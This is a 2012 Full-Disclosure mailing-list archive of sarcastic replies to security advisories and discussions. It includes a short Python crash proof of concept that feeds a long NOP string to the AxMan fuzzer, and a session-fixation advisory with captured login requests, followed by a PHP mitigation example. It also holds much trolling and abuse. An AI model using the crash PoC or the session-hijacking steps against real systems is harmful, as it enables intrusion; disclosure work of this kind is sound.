>> > Cc: "Full Disclosure b" , "BugTraq"
>> > 
>> > Subject: [Full-disclosure] Adobe Flash UpdateInstalls Other Warez
>> > without Consent
>> > Date: Fri, Sep 7, 2012 5:32 pm
>> >
>> >
>> > You didn't download it from download.cnet.com, by any chance?
>> > Sounds more like an infection to me.
>> > For windows, download and run the following programs.
>> > http://www.filehippo.com/download_malwarebytes_anti_malware/
>> > http://www.filehippo.com/download_spybot_search_destroy/5168/
>> > http://www.filehippo.com/download_superantispyware/
>> >
>> >
>> > On 06/09/2012 19:09, Jeffrey Walton wrote:
>> >> The company that writes the worlds most insecure software [1,2,3] has
>> >> figured out a way to further increase an attack surface.
>> >>
>> >> Adobe now includes additional warez in their updates without consent.
>> >> The warez includes a browser and tools bar. The attached image is what
>> >> I got when I agreed to update Adobe Flash because of recent security
>> >> vulnerability fixes.
>> >>
>> >> It appears Adobe has become a whore to Google like Mozilla.
>> >>
>> >> +1 Adobe.
>> >>
>> >> [1] http://www.google.com/#q=Adobe+site%3Asecurityfocus.com.
>> >> [2]
>> >
>> > http://web.nvd.nist.gov/view/vuln/search-results?query=adobe&search_type=all&cves=on
>> >> [3]
>> >
>> > http://lastwatchdog.com/adobe-surpasses-microsoft-favorite-hackers-target/
>> >> [4] http://www.theregister.co.uk/2009/12/29/security_predictions_2010/
>> >>
>> >>
>> >>


Re: [Full-disclosure] Splunk Vulnerability

2012-09-06 Thread Benji
Well, I'm glad we got multiple emails saying you all agree.

On Thu, Sep 6, 2012 at 8:50 AM, Michael D. Wood  wrote:
> I agree.  Splunk *IS* doing what it was designed to do.
>
>
>
> --
>
> Michael D. Wood
>
> ITSecurityPros.org
>
> www.itsecuritypros.org
>
>
>
> From: JxT [mailto:jxt.li...@gmail.com]
> Sent: Thursday, September 06, 2012 2:19 AM
> To: Zach C.
> Cc: Michael D. Wood; full-disclosure@lists.grok.org.uk
> Subject: Re: [Full-disclosure] Splunk Vulnerability
>
>
>
> On Wed, Sep 5, 2012 at 11:30 PM, Zach C.  wrote:
>
> 1.) The tool, Splunk, is designed to index logs
> 2.) Logs are arbitrary files.
> Therefore,
> 3.) Splunk is designed to index arbitrary files.
>
>
>
> Agreed, Splunk is doing exactly what it's designed to do. This is not a
> vulnerability within Splunk itself.
>
>


Re: [Full-disclosure] Printer in the DMZ

2012-08-27 Thread Benji
Yup, they're all mine. Congrats on ur diskovery of the century. You
know what you should do? you should make some sort of database for
google dorks, like hmm, maybe call it GHDB?

Impressive find, very impressed. If it's people like you that miss the
point of my posts, to point out how absurd this list is and its many
failings, then I think I have succeeded. Stay classy, keep fighting
whatever fight you're fighting.

On Mon, Aug 27, 2012 at 5:45 PM, Igor Igor  wrote:
> Robots.txt not supported in any printer.. too bad, all listed in all major
> search engine
>
>
> Benji, do they belong to you? You are the only one that I can think of
> that would put that in a DMZ
>
>
>
>
> - 1g0r



Re: [Full-disclosure] ZDI-12-149 : Cisco AnyConnect VPN Client Verification Bypass Remote Code Execution Vulnerability

2012-08-22 Thread Benji
" User interaction is required to exploit this vulnerability in that
the target must visit a malicious page or open a malicious file."

sorry, what?

On Wed, Aug 22, 2012 at 4:48 PM, ZDI Disclosures
 wrote:
> -BEGIN PGP SIGNED MESSAGE-
> Hash: SHA1
>
> ZDI-12-149 : Cisco AnyConnect VPN Client Verification Bypass Remote Code
> Execution Vulnerability
> http://www.zerodayinitiative.com/advisories/ZDI-12-149
> August 22, 2012
>
> - -- CVE ID:
> CVE-2012-2494
>
> - -- CVSS:
> 9, AV:N/AC:L/Au:N/C:P/I:P/A:C
>
> - -- Affected Vendors:
> Cisco
>
> - -- Affected Products:
> Cisco AnyConnect VPN Client
>
> - -- Vulnerability Details:
> This vulnerability allows remote attackers to execute arbitrary code on
> vulnerable installations of Cisco AnyConnect VPN Client. User interaction
> is required to exploit this vulnerability in that the target must visit a
> malicious page or open a malicious file.
>
> The specific flaw exists because the VPN AnyConnect helper program does not
> check the version number of the vpndownloader.exe program it downloads. As
> such it is possible to forcefully install an older version of the
> vpndownloader.exe that is vulnerable to previously patched issues.
>
> - -- Vendor Response:
> Cisco has issued an update to correct this vulnerability. More details can
> be found at:
> http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-
> sa-20120620-ac
>
> - -- Disclosure Timeline:
> 2011-11-22 - Vulnerability reported to vendor
> 2012-08-22 - Coordinated public release of advisory
>
> - -- Credit:
> This vulnerability was discovered by:
> * gwslabs.com
>
> - -- About the Zero Day Initiative (ZDI):
> Established by TippingPoint, The Zero Day Initiative (ZDI) represents
> a best-of-breed model for rewarding security researchers for responsibly
> disclosing discovered vulnerabilities.
>
> Researchers interested in getting paid for their security research
> through the ZDI can find more information and sign-up at:
>
> http://www.zerodayinitiative.com
>
> The ZDI is unique in how the acquired vulnerability information is
> used. TippingPoint does not re-sell the vulnerability details or any
> exploit code. Instead, upon notifying the affected product vendor,
> TippingPoint provides its customers with zero day protection through
> its intrusion prevention technology. Explicit details regarding the
> specifics of the vulnerability are not exposed to any parties until
> an official vendor patch is publicly available. Furthermore, with the
> altruistic aim of helping to secure a broader user base, TippingPoint
> provides this vulnerability information confidentially to security
> vendors (including competitors) who have a vulnerability protection or
> mitigation product.
>
> Our vulnerability disclosure policy is available online at:
>
> http://www.zerodayinitiative.com/advisories/disclosure_policy/
>
> Follow the ZDI on Twitter:
>
> http://twitter.com/thezdi
>
> -BEGIN PGP SIGNATURE-
> Version: PGP Desktop 10.2.0 (Build 1950)
> Charset: utf-8
>
> -END PGP SIGNATURE-
>


Re: [Full-disclosure] The Android Superuser App

2012-08-13 Thread Benji
Ok.

On Mon, Aug 13, 2012 at 2:28 PM, Jann Horn  wrote:
> On Sun, Aug 12, 2012 at 09:47:57PM +0200, Jann Horn wrote:
>> And finally, I've found another vuln that essentially lets apps gain root
>> rights without asking the user, and I will release all details about it in
>> two weeks.
>
> Found another independent vuln that also gives all apps root access, details
> will go public in two weeks, too.
>


Re: [Full-disclosure] WTB: CIK and Fortezza card

2012-08-13 Thread Benji
but with bowling 4 crypto as email, natural and logical 2 assume u
plan big crypto massacre, how many innocent bits will we lose this
time?


On Sat, Aug 11, 2012 at 8:07 PM, Hambone Turkey
 wrote:
> So I know FD isn't Craigslist but I figured its my best bet.  I am looking
> for a KSD-64 Crypto Ignition Key (CIK) as well as a Fortezza card.  If you
> know where I can get either, please contact me.  Note that
> http://www.psism.com lists Fortezza cards on their website but they don't
> sell them anymore.  FWIW I am a US citizen...so no, I'm not a spy :P
>
>


Re: [Full-disclosure] Hacker Highschool v2

2012-08-09 Thread Benji
ah fantastic, a lesson on trolling and bullying. what a valuable
service you are providing.

On Thu, Aug 9, 2012 at 8:19 PM, Pete Herzog  wrote:
> Hi,
>
> Version 2 of Hacker Highschool (www.hackerhighschool.org) is wrapping
> up. We will begin publishing/replacing each lesson as we finish it. Of
> course we can always use more dedicated experts to contribute which
> would speed the whole process up.
>
> More details on the project are available in a new article:
>
> http://opensource.com/life/12/8/hacker-highschool-students-learn-redesign-future
>
> FYI: since then, we've added 1 more lesson
>
>#22 Trolling and Bullying
>
> Enjoy!
>
> Sincerely,
> -pete.
>
>
> --
> Pete Herzog - Managing Director - p...@isecom.org
> ISECOM - Institute for Security and Open Methodologies
> www.isecom.org - www.osstmm.org
> www.hackerhighschool.org - www.badpeopleproject.org
>


Re: [Full-disclosure] AxMan ActiveX fuzzing <== Memory Corruption PoC

2012-07-30 Thread Benji
wait, this was a serious email? not like this bro, not like this.

On Sun, Jul 29, 2012 at 11:08 PM, kaveh ghaemmaghami
 wrote:
> I think ur on vacation now aren't u  Plus nobody ask u to read my
> post and i am not interested about ur opinion keep it for yourself
>
> On Sat, Jul 28, 2012 at 5:21 PM, kaveh ghaemmaghami
>  wrote:
>> Exploit Title: AxMan ActiveX fuzzing <== Memory Corruption PoC
>> Crash : http://imageshack.us/f/217/axman.jpg/
>> Date: July 28, 2012
>> Author: coolkaveh
>> coolka...@rocketmail.com
>> Https://twitter.com/coolkaveh
>> Vendor Homepage: http://digitaloffense.net/tools/axman/
>> version : 1.0.0
>> Tested on: windows 7 SP1
>> 
>> Crash The Exploiter
>>  Lame HD Moore fuzzer Memory Corruption
>>   By Awsome coolkaveh
>>
>> ---
>>
>> import os
>> import win32api
>> crash = "  Crash The Exploiter  "
>> lame="Lame HD Moore fuzzer Memory corruption  "
>> awsome="   By Awsome coolkaveh  "
>> print
>> print
>> print
>> print crash
>> print
>> print lame
>> print
>> print awsome
>> print
>> print
>> print
>> print
>> exploit = ("\x90" *800)
>> win32api.WinExec((r'"D:\axman-1.0.0\bin\axman.exe" %s') % exploit, 1)
>


Re: [Full-disclosure] [Anonymous/iWot] Somaleaks !!!

2012-07-19 Thread Benji
LOL @ script kiddie == "terrorist"

By that logic, public urination is an act of arson.

Both acts are petty and at best deserve to face a firing squad at dawn.

On Thu, Jul 19, 2012 at 2:53 PM,   wrote:
> On Wed, 18 Jul 2012 09:16:29 -0400, Abdikarim Roble said:
>
>> As some of us already explained, we are not a terrorist organization.
>> It's just that we are fed-up with the fact that our society is losing
>> time. So we just decided to speed-up actions against terrorists and
>> their friends. We will first try to eradicate the sources of terrorist
>> financing. It is not possible to know at this time the precise scope
>> or the duration of our actions to counter terrorist threats linked to
>> Internet.
>
> Cool story, bro.  Too bad you're going after terrorists rather than the *real*
> threat to our society - those who are destroying our civil liberties and way
> of life in the name of "protecting us from terrorists".
>
>


Re: [Full-disclosure] Linux - Indicators of compromise

2012-07-16 Thread Benji
So you're talking about making a baseline?

On Mon, Jul 16, 2012 at 7:52 PM, Ali Varshovi  wrote:
> Hello everybody and thank you for your useful comments.
>
> Now I'm thinking that we need a comparison base or normal behavior profile to 
> be able to detect any deviations or abnormal/suspicious activity. While some 
> known patterns of behaviors are useful to detect malware or backdoors we 
> still need that normal profile to detect 0-day or APT style intrusions. Isn't 
> that the same idea from early days of intrusion detection research (anomaly 
> detection approach)? Or maybe I'm off track.
>
> Thoughts?
>
> --Original Message--
> To: full-disclosure@lists.grok.org.uk
> Subject: Linux - Indicators of compromise
> Sent: Jul 14, 2012 8:46 AM
>
> Greetings FD,
>
> Does anyone have any guidelines/useful material on analysis logs of a Linux 
> machine to detect signs of compromise? The data collection piece is not a 
> challenge as a lot of useful information can be captured using commands and 
> some scripts. I'm wondering if there is any systematic approach to analyze 
> the collected logs? Most of the materials I've seen are more aligned to 
> malware and rootkit detection which is not the only concern apparently.
>
> Thanks,
>
> Ali
> .
> -
> Sent from my BlackBerry device
>


Re: [Full-disclosure] Linux - Indicators of compromise

2012-07-16 Thread Benji
" All compromised systems talk to the Internet to dump data or route spam."

yup, this is 1000% true and utterly foolproof.


On Mon, Jul 16, 2012 at 2:48 PM, Gary Baribault  wrote:
> I suggest one of the first answers was the good one, intercept the traffic
> routed to the internet with TCPDump. Filter out the normal traffic and see
> what's left. All compromised systems talk to the Internet to dump data or
> route spam. Be patient, some systems talk all the time, some once an hour ..
> but you will find some unexplained traffic. Once you do find that you're
> infected, don't bother cleaning up the system, format and restore the data!
>
> Gary Baribault
> Courriel: g...@baribault.net
> GPG Key: 0x685430d1
> Signature: 9E4D 1B7C CB9F 9239 11D9 71C3 6C35 C6B7 6854 30D1
>
> On 07/16/2012 09:40 AM, valdis.kletni...@vt.edu wrote:
>
> On Sat, 14 Jul 2012 12:46:50 -, "Ali Varshovi " said:
>
> Most of the materials I've seen are more aligned to malware and rootkit
> detection which is not the only concern apparently.
>
> It's hard to say what else to check without knowing what other concerns
> you're checking for, and what data sources are available (I'm thinking about
> auditd and friends, but there's other data sources as well).
>
>
>


Re: [Full-disclosure] Predefined Post Authentication Session ID Vulnerability

2012-07-13 Thread Benji
Yes but you live in cave x

On Fri, Jul 13, 2012 at 3:56 PM, Григорий Братислава
 wrote:
> On Fri, Jul 13, 2012 at 10:44 AM, Benji  wrote:
>
>> Come to Europe, we show you how to party@#!
>
> Is that is what Greeks and Spaniards call this behaviour? Is funny, to
> me is similar to riot.


Re: [Full-disclosure] Predefined Post Authentication Session ID Vulnerability

2012-07-13 Thread Benji
World is hard, big bully many places. Scary to think that I do nothing
to add to this informative, useful, and sometimes genuinely insightful
list where on a daily basis people restore my faith in humanity and
make me believe that common sense is not dead and that the word
'hacker' is not thrown around.

Come to Europe, we show you how to party@#!

On Fri, Jul 13, 2012 at 3:10 PM, Григорий Братислава
 wrote:
> On Thu, Jul 12, 2012 at 9:15 AM,   wrote:
>> Benji,
>>
>> Do you write anything but scathing criticism?  I've never seen you
>> contribute anything of use to this list.   You must be a real pleasure in
>> person.
>>
>
> s#ritney#enji#g
> http://www.youtube.com/watch?v=kHmvkRoEowc
>

Re: [Full-disclosure] Predefined Post Authentication Session ID Vulnerability

2012-07-13 Thread Benji
x

On Thu, Jul 12, 2012 at 2:15 PM,   wrote:
> Benji,
>
> Do you write anything but scathing criticism?  I've never seen you
> contribute anything of use to this list.   You must be a real pleasure in
> person.
>
>
> Sent using Hushmail
>
>
>
> On 07/12/2012 at 4:52 AM, Benji  wrote:
>
> Ah, please send more emails explaining the faults of retarded
> programmers and serious vulnerabilities, and then link to an owasp
> page.
>
> Can you explain HTTPOnly cookies to me? I will only accept your
> explanation if you can justify an impact of Critical, a likelihood of
> High and a severity of High?
>
> fuq'in kidz...
>
> On Wed, Jul 11, 2012 at 11:20 PM, Gökhan Muharremoğlu
>  wrote:
>>
>> This article explains how this vulnerability works with Session Fixation
>> attack.
>>
>> https://www.owasp.org/index.php/Testing_for_Session_Fixation_(OWASP-SM-003)
>>
>>> From: gokhan.muharremo...@iosec.org
>>> To: full-disclosure@lists.grok.org.uk
>>> Date: Wed, 11 Jul 2012 11:34:11 +0300
>>> Subject: [Full-disclosure] Predefined Post Authentication Session ID
>>> Vulnerability
>>>
>>> Vulnerability Name: Predefined Post Authentication Session ID
>>> Vulnerability
>>> Type: Improper Session Handling
>>> Impact: Session Hijacking
>>> Level: Medium
>>> Date: 10.07.2012
>>> Vendor: Vendor-neutral
>>> Issuer: Gokhan Muharremoglu
>>> E-mail: gokhan.muharremo...@iosec.org
>>>
>>>
>>> VULNERABILITY
>>> If a web application starts a session and defines a session id before a
>>> user authenticated, this session id must be changed after a successful
>>> authentication. If web application uses the same session id before and
>>> after authentication, any legitimate user who has gained the "before
>>> authentication" session id can hijack future "after authentication"
>>> sessions too.
>>>
>>> Vulnerable Login Page & Session ID before Authentication
>>> (Status-Line) HTTP/1.1 200 OK
>>> Server Apache/2.2.3 (CentOS)
>>> Set-Cookie PHPSESSID=8usd2oeo11a8cod9q3lnev9je2; path=/
>>> Expires Thu, 19 Nov 1981 08:52:00 GMT
>>> Cache-Control no-store, no-cache, must-revalidate, post-check=0,
>>> pre-check=0
>>> Pragma no-cache
>>> Content-Type text/html
>>> Content-Length 308
>>> Date Tue, 10 Jul 2012 06:16:57 GMT
>>> X-Varnish 1922993981
>>> Age 0
>>> Via 1.1 varnish
>>> Connection keep-alive
>>>
>>>
>>> Vulnerable Login Page & Authentication Request
>>> (Request-Line) POST /iosec_login_vulnerable.php HTTP/1.1
>>> Host www.iosec.org
>>> User-Agent Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.2.25)
>>> Gecko/20111212 Firefox/3.6.25 ( .NET CLR 3.5.30729; .NET4.0E)
>>> Accept text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
>>> Accept-Language tr-tr,tr;q=0.8,en-us;q=0.5,en;q=0.3
>>> Accept-Encoding gzip,deflate
>>> Accept-Charset ISO-8859-9,utf-8;q=0.7,*;q=0.7
>>> Keep-Alive 115
>>> Connection keep-alive
>>> Referer http://www.iosec.org/iosec_login_vulnerable.php
>>> Cookie PHPSESSID=8usd2oeo11a8cod9q3lnev9je2
>>> Content-Type application/x-www-form-urlencoded
>>> Content-Length 42
>>> POST DATA
>>> user gokhan
>>> pass muharremoglu
>>> submit Login
>>>
>>>
>>> Vulnerable Login Page & Session ID after Authentication
>>> (Status-Line) HTTP/1.1 200 OK
>>> Server Apache/2.2.3 (CentOS)
>>> Set-Cookie PHPSESSID=8usd2oeo11a8cod9q3lnev9je2; path=/
>>> Expires Thu, 19 Nov 1981 08:52:00 GMT
>>> Cache-Control no-store, no-cache, must-revalidate, post-check=0,
>>> pre-check=0
>>> Pragma no-cache
>>> Content-Type text/html
>>> Content-Length 308
>>> Date Tue, 10 Jul 2012 06:16:57 GMT
>>> X-Varnish 1922993981
>>> Age 0
>>> Via 1.1 varnish
>>> Connection keep-alive
>>>
>>>
>>> MITIGATION
>>> To avoid this vulnerability, sessions must be regenerated after a
>>> successful
>>> login. In a session fixation attack, attacker fixates (sets) another
>>> person's (victim's) session identifier because of "never regenerated and
>>> validated" session i

Re: [Full-disclosure] Predefined Post Authentication Session ID Vulnerability

2012-07-13 Thread Benji
Yes, god Jann, you're such a moron.

On Fri, Jul 13, 2012 at 9:46 AM, Gokhan Muharremoglu
 wrote:
> You can find an example page and combined vulnerabilities at the URL below.
> This example login page is affected by Predefined Post Authentication
> Session ID Vulnerability.
> This vulnerability can lead to a social engineering scenario or other hijacking
> attack scenarios when mixed with other vulnerabilities (such as XSS).
>
> For proof of concept:
>
> http://www.iosec.org/iosec_login_vulnerable.php
>
>
> Predefined Post Authentication Session ID Vulnerability is a Vendor-neutral
> vulnerability and it lets attackers design new attack scenarios.
> A lot of web applications on the Internet are affected by this vulnerability.
>
> ---
> Vulnerability Name: Predefined Post Authentication Session ID Vulnerability
> Type: Improper Session Handling
> Impact: Session Hijacking
> Level: Medium
> Date: 10.07.2012
> Vendor: Vendor-neutral
> Issuer: Gokhan Muharremoglu
> E-mail: gokhan.muharremo...@iosec.org
>
>
> VULNERABILITY
> If a web application starts a session and defines a session id before a user
> authenticated, this session id must be changed after a successful
> authentication. If web application uses the same session id before and after
> authentication, any legitimate user who has gained the "before
> authentication" session id can hijack future "after authentication" sessions
> too.
>
> MITIGATION
> To avoid this vulnerability, sessions must be regenerated after a successful
> login. In a session fixation attack, attacker fixates (sets) another
> person's (victim's) session identifier because of "never regenerated and
> validated" session id and this vulnerability can also lead to the Session
> Fixation attack or etc.
>
> Gokhan Muharremoglu
> Information Security Specialist
> (CEH, ECSA, CIW-Web Security Professional, Security+, EXIN 27002 ISFS)
>
> -Original Message-
> From: Jann Horn [mailto:jannh...@googlemail.com]
> Sent: Friday, July 13, 2012 2:06 AM
> To: Gokhan Muharremoglu
> Cc: full-disclosure@lists.grok.org.uk
> Subject: Re: [Full-disclosure] Predefined Post Authentication Session ID
> Vulnerability
>
> On Wed, Jul 11, 2012 at 11:34:11AM +0300, Gokhan Muharremoglu wrote:
>> Vulnerability Name: Predefined Post Authentication Session ID
>> Vulnerability
>> Type: Improper Session Handling
>> Impact: Session Hijacking
>> Level: Medium
>> Date: 10.07.2012
>> Vendor: Vendor-neutral
>> Issuer: Gokhan Muharremoglu
>> E-mail: gokhan.muharremo...@iosec.org
>>
>>
>> VULNERABILITY
>> If a web application starts a session and defines a session id before
>> a user authenticated, this session id must be changed after a
>> successful authentication. If web application uses the same session id
>> before and after authentication, any legitimate user who has gained
>> the "before authentication" session id can hijack future "after
>> authentication" sessions too.
>
> Uh, so, erm, you assume that someone can steal my cookie/set it/whatever
> although the Same Origin Policy should clearly not allow that, and then,
> after I have logged in, he can't just steal my cookie? Unless you allow
> setting the session-ID via an URL or so (which would IMO be pretty stupid),
> I can't see how this is a realistic, vendor-neutral attack. Could you
> explain this a bit better? I don't get it.
>


Re: [Full-disclosure] Predefined Post Authentication Session ID Vulnerability

2012-07-12 Thread Benji
Ah, please send more emails explaining the faults of retarded
programmers and serious vulnerabilities, and then link to an owasp
page.

Can you explain HTTPOnly cookies to me? I will only accept your
explanation if you can justify an impact of Critical, a likelihood of
High and a severity of High?

fuq'in kidz...

On Wed, Jul 11, 2012 at 11:20 PM, Gökhan Muharremoğlu
 wrote:
>
> This article explains how this vulnerability works with Session Fixation
> attack.
> https://www.owasp.org/index.php/Testing_for_Session_Fixation_(OWASP-SM-003)
>
>> From: gokhan.muharremo...@iosec.org
>> To: full-disclosure@lists.grok.org.uk
>> Date: Wed, 11 Jul 2012 11:34:11 +0300
>> Subject: [Full-disclosure] Predefined Post Authentication Session ID
>> Vulnerability
>>
>> Vulnerability Name: Predefined Post Authentication Session ID
>> Vulnerability
>> Type: Improper Session Handling
>> Impact: Session Hijacking
>> Level: Medium
>> Date: 10.07.2012
>> Vendor: Vendor-neutral
>> Issuer: Gokhan Muharremoglu
>> E-mail: gokhan.muharremo...@iosec.org
>>
>>
>> VULNERABILITY
>> If a web application starts a session and defines a session id before a
>> user authenticated, this session id must be changed after a successful
>> authentication. If web application uses the same session id before and after
>> authentication, any legitimate user who has gained the "before
>> authentication" session id can hijack future "after authentication"
>> sessions too.
>>
>>
>> Vulnerable Login Page & Session ID before Authentication
>> (Status-Line) HTTP/1.1 200 OK
>> Server Apache/2.2.3 (CentOS)
>> Set-Cookie PHPSESSID=8usd2oeo11a8cod9q3lnev9je2; path=/
>> Expires Thu, 19 Nov 1981 08:52:00 GMT
>> Cache-Control no-store, no-cache, must-revalidate, post-check=0,
>> pre-check=0
>> Pragma no-cache
>> Content-Type text/html
>> Content-Length 308
>> Date Tue, 10 Jul 2012 06:16:57 GMT
>> X-Varnish 1922993981
>> Age 0
>> Via 1.1 varnish
>> Connection keep-alive
>>
>>
>> Vulnerable Login Page & Authentication Request
>> (Request-Line) POST /iosec_login_vulnerable.php HTTP/1.1
>> Host www.iosec.org
>> User-Agent Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.2.25)
>> Gecko/20111212 Firefox/3.6.25 ( .NET CLR 3.5.30729; .NET4.0E)
>> Accept text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
>> Accept-Language tr-tr,tr;q=0.8,en-us;q=0.5,en;q=0.3
>> Accept-Encoding gzip,deflate
>> Accept-Charset ISO-8859-9,utf-8;q=0.7,*;q=0.7
>> Keep-Alive 115
>> Connection keep-alive
>> Referer http://www.iosec.org/iosec_login_vulnerable.php
>> Cookie PHPSESSID=8usd2oeo11a8cod9q3lnev9je2
>> Content-Type application/x-www-form-urlencoded
>> Content-Length 42
>> POST DATA
>> user gokhan
>> pass muharremoglu
>> submit Login
>>
>>
>> Vulnerable Login Page & Session ID after Authentication
>> (Status-Line) HTTP/1.1 200 OK
>> Server Apache/2.2.3 (CentOS)
>> Set-Cookie PHPSESSID=8usd2oeo11a8cod9q3lnev9je2; path=/
>> Expires Thu, 19 Nov 1981 08:52:00 GMT
>> Cache-Control no-store, no-cache, must-revalidate, post-check=0,
>> pre-check=0
>> Pragma no-cache
>> Content-Type text/html
>> Content-Length 308
>> Date Tue, 10 Jul 2012 06:16:57 GMT
>> X-Varnish 1922993981
>> Age 0
>> Via 1.1 varnish
>> Connection keep-alive
>>
>>
>> MITIGATION
>> To avoid this vulnerability, sessions must be regenerated after a
>> successful
>> login. In a session fixation attack, attacker fixates (sets) another
>> person's (victim's) session identifier because of "never regenerated and
>> validated" session id and this vulnerability can also lead to the Session
>> Fixation attack.
>>

Re: [Full-disclosure] IOSEC HTTP Anti Flood/DoS Security Gateway Module (PHP Script)

2012-07-11 Thread Benji
Just read this crap due to your amazing emails. Crap code, easily bypassable.

On Wed, Jul 11, 2012 at 9:37 AM, Gokhan Muharremoglu
 wrote:
> http://sourceforge.net/projects/iosec/
>
> This module provides security enhancements against (HTTP) Flood & Brute
> Force Attacks for native PHP or .NET scripts at web application level.
> Massive crawling/scanning tools, HTTP flood tools can be detected and
> blocked by this module via htaccess or iptables, etc.
>
> You can use this module by including "iosec.php" to any PHP file which wants
> to be protected.
>
> You can test module here: http://www.iosec.org/test.php (demo)
>
> Wordpress Plugin
> http://wordpress.org/extend/plugins/iosec-anti-flood-security-gateway-module
>
> CHANGES v.1.7
> - Request Cache Size Option
> - Improved Implicit Deny Mode
> - Excluded Files Support
> - Admin GUI Removed
> - Config File Removed
> - Connection Limit Support
> - Whitelist Support
> - Reverse Proxy Support
> - reCAPTCHA Support
>
> This is a unique project and it is the world's first web application flood
> guard script.
> At web application (scripting) level you can,
> - Block proxies. (only via HTTP header)
> - Detect flooding IP addresses.
> - Slow down or restrict access for automated tools (HTTP flood, brute force
> tools, vulnerability scanners, etc.)
> - Save your server resources (database, cpu, ram, etc.) under an attack.
> - Restrict access permanently or temporarily for listed IP addresses in
> "banlist" file.
> - Notify yourself via email alerts when attacks begin.
> - Implicit deny for DDoS attacks
>
> You can use IOSEC under .NET see. http://phalanger.codeplex.com/
>
> Gokhan Muharremoglu
>


Re: [Full-disclosure] Predefined Post Authentication Session ID Vulnerability

2012-07-11 Thread Benji
I have no words, just shock.

On Wed, Jul 11, 2012 at 9:34 AM, Gokhan Muharremoglu
 wrote:
> Vulnerability Name: Predefined Post Authentication Session ID Vulnerability
> Type: Improper Session Handling
> Impact: Session Hijacking
> Level: Medium
> Date: 10.07.2012
> Vendor: Vendor-neutral
> Issuer: Gokhan Muharremoglu
> E-mail: gokhan.muharremo...@iosec.org
>
>
> VULNERABILITY
> If a web application starts a session and defines a session id before a user
> authenticated, this session id must be changed after a successful
> authentication. If web application uses the same session id before and after
> authentication, any legitimate user who has gained the "before
> authentication" session id can hijack future "after authentication" sessions
> too.
>
>
> Vulnerable Login Page & Session ID before Authentication
> (Status-Line)   HTTP/1.1 200 OK
> Server  Apache/2.2.3 (CentOS)
> Set-Cookie  PHPSESSID=8usd2oeo11a8cod9q3lnev9je2; path=/
> Expires Thu, 19 Nov 1981 08:52:00 GMT
> Cache-Control   no-store, no-cache, must-revalidate, post-check=0,
> pre-check=0
> Pragma  no-cache
> Content-Type  text/html
> Content-Length  308
> Date  Tue, 10 Jul 2012 06:16:57 GMT
> X-Varnish   1922993981
> Age 0
> Via 1.1 varnish
> Connection  keep-alive
>
>
> Vulnerable Login Page & Authentication Request
> (Request-Line)  POST /iosec_login_vulnerable.php HTTP/1.1
> Host  www.iosec.org
> User-Agent  Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.2.25)
> Gecko/20111212 Firefox/3.6.25 ( .NET CLR 3.5.30729; .NET4.0E)
> Accept  text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
> Accept-Language tr-tr,tr;q=0.8,en-us;q=0.5,en;q=0.3
> Accept-Encoding gzip,deflate
> Accept-Charset  ISO-8859-9,utf-8;q=0.7,*;q=0.7
> Keep-Alive  115
> Connection  keep-alive
> Referer  http://www.iosec.org/iosec_login_vulnerable.php
> Cookie  PHPSESSID=8usd2oeo11a8cod9q3lnev9je2
> Content-Type  application/x-www-form-urlencoded
> Content-Length  42
> POST DATA
> user  gokhan
> pass  muharremoglu
> submit  Login
>
>
> Vulnerable Login Page & Session ID after Authentication
> (Status-Line)   HTTP/1.1 200 OK
> Server  Apache/2.2.3 (CentOS)
> Set-Cookie  PHPSESSID=8usd2oeo11a8cod9q3lnev9je2; path=/
> Expires Thu, 19 Nov 1981 08:52:00 GMT
> Cache-Control   no-store, no-cache, must-revalidate, post-check=0,
> pre-check=0
> Pragma  no-cache
> Content-Type  text/html
> Content-Length  308
> Date  Tue, 10 Jul 2012 06:16:57 GMT
> X-Varnish   1922993981
> Age 0
> Via 1.1 varnish
> Connection  keep-alive
>
>
> MITIGATION
> To avoid this vulnerability, sessions must be regenerated after a successful
> login. In a session fixation attack, attacker fixates (sets) another
> person's (victim's) session identifier because of "never regenerated and
> validated" session id and this vulnerability can also lead to the Session
> Fixation attack.
>

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
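The mitigation described in the advisory quoted above, as an added PHP example that is not part of the original post: the login handler issues a fresh session ID once the credentials check out, so an ID that existed before authentication (as in the captured `PHPSESSID` headers) never becomes an authenticated one. The function names, the in-memory user table and the cookie attributes are assumptions made for the example.

```php
<?php
declare(strict_types=1);

// Added example (not code from the advisory). Function names, the user table
// and the cookie attributes below are assumptions made for illustration.

function start_hardened_session(): void
{
    // Reject session IDs that the server did not issue itself.
    ini_set('session.use_strict_mode', '1');
    // Take the ID from the cookie only, never from a URL parameter.
    ini_set('session.use_only_cookies', '1');
    ini_set('session.use_trans_sid', '0');
    session_set_cookie_params([
        'path'     => '/',
        'secure'   => true,   // assumption: the site is served over HTTPS
        'httponly' => true,
        'samesite' => 'Lax',
    ]);
    session_start();
}

/** Returns true and rotates the session ID when the credentials are valid. */
function login(string $user, string $pass, array $users): bool
{
    if (!isset($users[$user]) || !password_verify($pass, $users[$user])) {
        return false; // failed login: the session stays anonymous and keeps its ID
    }
    // Issue a new ID for the authenticated session. Passing true deletes the
    // old session data, so the pre-login ID no longer maps to anything.
    if (!session_regenerate_id(true)) {
        throw new RuntimeException('could not rotate the session ID');
    }
    $_SESSION = ['user' => $user, 'login_time' => time()];
    return true;
}

// Stand-alone check (php thisfile.php): the ID seen before login must differ
// from the ID in use after a successful login. No output is produced until the
// session work is finished, because the session functions refuse to run once
// output has started.
if (PHP_SAPI === 'cli') {
    session_save_path(sys_get_temp_dir()); // writable session store for the demo
    // Constructed account for the demo, not a real credential.
    $users = ['alice' => password_hash('correct horse', PASSWORD_DEFAULT)];

    start_hardened_session();
    $before    = session_id();
    $failed    = login('alice', 'wrong password', $users);
    $afterFail = session_id();
    $ok        = login('alice', 'correct horse', $users);
    $after     = session_id();
    session_write_close();

    echo 'failed login accepted:      ', var_export($failed, true), "\n";
    echo 'ID kept after failed login: ', var_export($before === $afterFail, true), "\n";
    echo 'valid login accepted:       ', var_export($ok, true), "\n";
    echo 'ID rotated after login:     ', var_export($before !== $after, true), "\n";
}
```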


Re: [Full-disclosure] Basilic RCE bug

2012-07-06 Thread Benji
